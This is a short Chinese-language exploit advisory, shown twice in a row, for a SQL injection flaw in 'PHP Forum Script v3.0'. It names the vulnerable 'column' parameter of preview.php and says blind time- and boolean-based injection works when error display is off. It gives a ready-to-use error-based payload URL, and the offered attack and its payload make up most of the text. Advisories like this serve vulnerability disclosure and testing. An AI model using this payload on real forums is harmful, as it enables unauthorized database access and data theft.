PHP Forum Script v3.0 - SQL Injection PHP Forum Script v3.0 ,存在参数过滤不严,导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,如果关闭了错误显示,可以采用基于时间和布尔的盲注 Google Dork: N/A 注入点: http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC payload: /preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(md5(233),0x717a787071,(SELECT (ELT(7489=7489,1))),0x7171786a71,0x78))s), 8446744073709551610, 8446744073709551610)))&direction=DESC 测试截图:  其他类型的注入: 
PHP Forum Script v3.0 - SQL Injection PHP Forum Script v3.0 ,存在参数过滤不严,导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,如果关闭了错误显示,可以采用基于时间和布尔的盲注 Google Dork: N/A 注入点: http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC payload: /preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(md5(233),0x717a787071,(SELECT (ELT(7489=7489,1))),0x7171786a71,0x78))s), 8446744073709551610, 8446744073709551610)))&direction=DESC 测试截图:  其他类型的注入: 